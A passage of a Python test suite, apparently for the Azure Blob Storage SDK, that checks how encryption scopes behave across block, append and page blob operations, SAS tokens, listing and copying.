put_block_list_resp = blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_put_block_and_put_block_list_with_blob_sas(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_name = self._get_blob_reference()
token1 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
)
blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
.get_blob_client(self.container_name, blob_name)
blob_client.stage_block('1', b'AAA')
blob_client.stage_block('2', b'BBB')
blob_client.stage_block('3', b'CCC')
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = blob_client.commit_block_list(block_list)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_put_block_and_put_block_list_with_blob_sas_fails(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_name = self._get_blob_reference()
token1 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
)
blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
.get_blob_client(self.container_name, blob_name)
# both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
with self.assertRaises(HttpResponseError):
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# both ses in SAS and encryption_scopes are both set and have SAME values will succeed
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
# Act
block_list = [BlobBlock(block_id='1')]
# both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
with self.assertRaises(HttpResponseError):
blob_client.commit_block_list(block_list, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# both ses in SAS and encryption_scopes are both set and have SAME values will succeed
put_block_list_resp = blob_client.commit_block_list(block_list, encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
# generate a sas with a different encryption scope
token2 = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=storage_account_key,
permission=BlobSasPermissions(read=True, write=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
)
blob_client_diff_encryption_scope_sas = BlobServiceClient(self.account_url(storage_account_name, "blob"), token2)\
.get_blob_client(self.container_name, blob_name)
# blob can be downloaded successfully no matter which encryption scope is used on the blob actually
# the encryption scope on blob is TEST_SAS_ENCRYPTION_SCOPE and ses is TEST_ENCRYPTION_KEY_SCOPE in SAS token,
# while we can still download the blob successfully
blob = blob_client_diff_encryption_scope_sas.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAA')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_chunks(self, storage_account_name, storage_account_key):
# parallel operation
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# Arrange
# to force the in-memory chunks to be used
self.config.use_byte_buffer = True
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_sub_streams(self, storage_account_name, storage_account_key):
# problem with the recording framework can only run live
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_single_chunk(self, storage_account_name, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
data = b'AAABBBCCC'
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_put_block_from_url_and_commit_with_cpk(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# create source blob and get source blob url
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # Make sure using chunk upload, then we can record the request
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
# create destination blob
self.config.use_byte_buffer = False
destination_blob_client, _ = self._create_block_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act part 1: make put block from url calls
destination_blob_client.stage_block_from_url(block_id=1, source_url=source_blob_url,
source_offset=0, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
destination_blob_client.stage_block_from_url(block_id=2, source_url=source_blob_url,
source_offset=4 * 1024, source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert blocks
committed, uncommitted = destination_blob_client.get_block_list('all')
self.assertEqual(len(uncommitted), 2)
self.assertEqual(len(committed), 0)
# commit the blocks without cpk should fail
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2')]
with self.assertRaises(HttpResponseError):
destination_blob_client.commit_block_list(block_list)
# Act commit the blocks with cpk should succeed
put_block_list_resp = destination_blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
# Act get the blob content
blob = destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data[0: 8 * 1024])
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_append_block(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
for content in [b'AAA', b'BBB', b'CCC']:
append_blob_prop = blob_client.append_block(content, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_append_block_from_url(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # chunk upload
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
destination_blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = destination_blob_client.append_block_from_url(source_blob_url,
source_offset=0,
source_length=4 * 1024,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = destination_blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data[0: 4 * 1024])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_append_blob_with_chunks(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = blob_client.upload_blob(self.byte_data,
blob_type=BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_update_page(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = blob_client.upload_page(self.byte_data,
offset=0,
length=len(self.byte_data),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_update_page_from_url(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
source_blob_name = self.get_resource_name("sourceblob")
self.config.use_byte_buffer = True # Make sure using chunk upload, then we can record the request
source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
source_blob_sas = generate_blob_sas(
source_blob_client.account_name,
source_blob_client.container_name,
source_blob_client.blob_name,
snapshot=source_blob_client.snapshot,
account_key=source_blob_client.credential.account_key,
permission=BlobSasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1)
)
source_blob_url = source_blob_client.url + "?" + source_blob_sas
self.config.use_byte_buffer = False
blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = blob_client.upload_pages_from_url(source_blob_url,
offset=0,
length=len(self.byte_data),
source_offset=0,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_page_blob_with_chunks(self, storage_account_name, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = bsc.get_blob_client(self.container_name, self._get_blob_reference())
page_blob_prop = blob_client.upload_blob(self.byte_data,
blob_type=BlobType.PageBlob,
max_concurrency=2,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_get_set_blob_metadata(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
blob_props = blob_client.get_blob_properties()
# Assert
self.assertTrue(blob_props.server_encrypted)
self.assertEqual(blob_props['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act set blob properties
metadata = {'hello': 'world', 'number': '42', 'up': 'upval'}
with self.assertRaises(HttpResponseError):
blob_client.set_blob_metadata(
metadata=metadata,
)
blob_client.set_blob_metadata(metadata=metadata, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
blob_props = blob_client.get_blob_properties()
md = blob_props.metadata
self.assertEqual(3, len(md))
self.assertEqual(md['hello'], 'world')
self.assertEqual(md['number'], '42')
self.assertEqual(md['up'], 'upval')
self.assertFalse('Up' in md)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_snapshot_blob(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act without cpk should not work
with self.assertRaises(HttpResponseError):
blob_client.create_snapshot()
# Act with cpk should work
blob_snapshot = blob_client.create_snapshot(encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(blob_snapshot)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_list_blobs(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, blob_name="blockblob", data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
container_client = bsc.get_container_client(self.container_name)
generator = container_client.list_blobs(include="metadata")
for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
self.assertEqual(blob.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_list_blobs_using_container_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
token = generate_container_sas(
storage_account_name,
self.container_name,
storage_account_key,
permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
self._create_append_blob(bsc_with_sas_credential)
# generate a token with TEST_ENCRYPTION_KEY_SCOPE
token2 = generate_container_sas(
storage_account_name,
self.container_name,
storage_account_key,
permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE
)
bsc_with_diff_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=token2,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc_with_diff_sas_credential.get_container_client(self.container_name)
# The ses field in SAS token when list blobs is different from the encryption scope used on creating blob, while
# list blobs should also succeed
generator = container_client.list_blobs(include="metadata")
for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
# and the encryption scope is the same as the one on blob creation
self.assertEqual(blob.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_with_account_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
sas_token = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE_2
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc_with_sas_credential)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE_2
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
#
sas_token2 = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_account_key_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token2,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
copied_blob = self.get_resource_name('copiedblob')
copied_blob_client = bsc_with_account_key_credential.get_blob_client(self.container_name, copied_blob)
# TODO: to confirm with Sean/Heidi ses in SAS cannot be set for async copy.
# The test failed for async copy (without requires_sync=True)
copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True)
props = copied_blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc_with_sas_credential)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_blob_from_url_with_ecryption_scope(self, storage_account_name, storage_account_key):
# Arrange
# create sas for source blob
sas_token = generate_account_sas(
storage_account_name,
account_key=storage_account_key,
resource_types=ResourceTypes(object=True, container=True),
permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
bsc_with_sas_credential = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc_with_sas_credential)
blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
copied_blob = self.get_resource_name('copiedblob')
copied_blob_client = bsc.get_blob_client(self.container_name, copied_blob)
copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True,
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
props = copied_blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(bsc_with_sas_credential)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_with_user_delegation_encryption_scope_sas(self, storage_account_name, storage_account_key):
# Arrange
# to get user delegation key
oauth_token_credential = self.generate_oauth_token()
service_client = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=oauth_token_credential,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
user_delegation_key = service_client.get_user_delegation_key(datetime.utcnow(),
datetime.utcnow() + timedelta(hours=1))
self._setup(service_client)
blob_name = self.get_resource_name('blob')
sas_token = generate_blob_sas(
storage_account_name,
self.container_name,
blob_name,
account_key=user_delegation_key,
permission=BlobSasPermissions(read=True, write=True, create=True, delete=True),
expiry=datetime.utcnow() + timedelta(hours=1),
encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
)
bsc_with_delegation_sas = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=sas_token,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
# blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE
blob_client, _ = self._create_block_blob(bsc_with_delegation_sas, blob_name=blob_name, data=b'AAABBBCCC', overwrite=True)
props = blob_client.get_blob_properties()
self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
self._teardown(service_client)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc.create_container('cpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE)
container_props = container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
for container in bsc.list_containers(name_starts_with='cpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
